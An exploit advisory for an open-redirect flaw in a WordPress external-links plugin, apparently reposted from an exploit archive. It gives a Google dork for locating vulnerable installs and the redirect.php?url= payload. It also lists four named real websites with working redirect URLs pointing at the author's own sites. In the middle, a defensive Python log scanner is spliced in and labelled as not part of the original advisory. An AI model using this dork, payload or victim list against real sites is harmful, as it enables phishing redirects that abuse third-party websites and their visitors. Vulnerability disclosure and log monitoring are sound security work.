####################################################################
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info/''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html
####################################################################
# Description about Software :
***************************
“WP External Links (nofollow new tab seo)” is open source software.
Manage external and internal links on your site.
####################################################################
# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
because the application fails to properly verify user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites
and conduct phishing attacks; other attacks are also possible.
WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are
vulnerable; prior versions may also be affected.
####################################################################
# Open Redirection Exploit :
**************************
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
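For site owners checking whether this endpoint has been used against their visitors, the following added example (not part of the original advisory and not the plugin's code) scans web server access logs for redirect.php requests whose url parameter leaves the site's own hosts. The combined log format, the own-host allowlist, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint path taken from the advisory; everything else here is an assumption.
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (combined log format, reserved example hosts and IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Feb/2019:10:00:01 +0000] "GET ' + REDIRECT_PATH
    + '?url=https://blog.example.com/post HTTP/1.1" 302 0',
    '203.0.113.8 - - [16/Feb/2019:10:00:02 +0000] "GET ' + REDIRECT_PATH
    + '?url=https%3A%2F%2Flogin.example.net%2F HTTP/1.1" 302 0',
    '203.0.113.9 - - [16/Feb/2019:10:00:03 +0000] "GET /wp' + REDIRECT_PATH
    + '?url=/%5Cexample.org HTTP/1.1" 302 0',
    '203.0.113.9 - - [16/Feb/2019:10:00:04 +0000] "GET /index.php?url=https://example.org HTTP/1.1" 200 512',
]


def redirect_target_host(request_uri):
    """Host named by url= on a redirect.php request; None if not that endpoint."""
    parts = urlsplit(request_uri)
    if not parts.path.endswith(REDIRECT_PATH):
        return None
    values = parse_qs(parts.query).get("url")  # parse_qs also percent-decodes
    if not values:
        return None
    # Browsers treat "\" like "/", so normalise before extracting the host.
    target = values[0].strip().replace("\\", "/")
    host = urlsplit(target).hostname  # covers https://host and //host forms
    return host.lower() if host else ""


def find_offsite_redirects(log_lines, own_hosts):
    """Return (line_no, status, host) for redirect.php hits leaving own_hosts."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        try:
            host = redirect_target_host(m.group(1))
        except ValueError:  # malformed target, report it rather than skip it
            host = "<unparseable>"
        if host and host not in own:
            hits.append((n, int(m.group(2)), host))
    return hits
```

Relative targets such as /about yield an empty host and are not reported; any hit with a 3xx status is a redirect the server actually issued to an off-site host.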
####################################################################
# Example Vulnerable Sites :
*************************
[+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com
[+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com
[+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/
[+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################